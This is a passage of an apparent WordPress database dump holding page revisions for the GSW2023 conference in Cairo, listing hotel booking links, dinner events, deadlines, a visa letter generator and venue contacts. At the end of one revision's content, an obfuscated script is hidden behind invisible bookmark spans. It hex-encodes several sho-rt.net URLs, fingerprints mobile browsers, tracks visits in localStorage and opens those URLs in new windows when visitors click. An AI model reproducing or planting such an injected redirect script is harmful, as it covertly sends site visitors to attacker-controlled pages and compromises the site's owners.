#ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\r\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\r\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][vc_column_text][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<ul>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_column_text][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n<p>[/ultimate_heading][/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-30 17:26:55','2023-08-30 17:26:55','',3066,'https://gsw2023.com/?p=5442',0,'revision','',0),
(5443,1,'2023-08-30 17:30:01','2023-08-30 17:30:01','<p><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Under the Auspices of </strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>Prime Minister of the </strong><strong>Arab Republic of Egypt</strong></span></h4>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\" css=\".vc_custom_1692155587524{margin-left: -50px !important;}\"][/vc_column][/vc_row]<span 